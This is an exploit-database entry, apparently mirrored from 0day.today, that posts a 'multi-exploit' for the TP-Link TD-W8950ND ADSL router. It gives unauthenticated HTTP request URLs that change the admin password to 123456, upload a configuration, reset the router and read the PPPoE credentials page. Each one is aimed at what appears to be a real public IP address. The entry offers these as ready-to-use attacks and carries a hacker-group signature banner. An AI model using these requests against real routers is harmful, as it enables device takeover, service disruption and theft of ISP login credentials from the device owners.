id: 19240
date: 08/22/2012
title: TP-Link 150M Wireless Lite-N ADSL2+ Modem Router Model No: TD-W8950ND Vulnerabilities
author: The Black Devils
cves: 

# Exploit Title:150M Wireless Lite N ADSL2+ Modem Router Model No: TD-                W8950ND Multi-exploit
# Author: The Black Devils

150M Wireless Lite N ADSL2+ Modem Router Model No: TD-W8950ND Multiexploit


Modem Pic
## Change Login Password ##

http://41.107.137.182/password.cgi?syspassword=123456

new password is : 123456

## upload config ##

http://41.107.137.182/upload.cgi

## reset router ##

http://41.107.137.182/resetrouter.cgi

## read PPPOE.cgi ##

http://41.107.137.182/pppoe.cgi


------------------------------------------------------
Contact  :Oeb1590@hotmail.com
Facebook : Https:\www.facebook.com\Want.Revenge 

              \|||/
           .-.________                (o o)                ________.-.
     -----/ \_)_______)  +----------oooO------------+   (_______(_/   \------
         (    ()___)         The Blacke Devils               (___()    )
               ()__)                                         (__() 
        ----\___()_)         Algeria Warriors                (_()___/-----                                   
                         +-------------Ooo----------+ 
                               In:Arab47.com



#  0day.today [2023-03-22]  #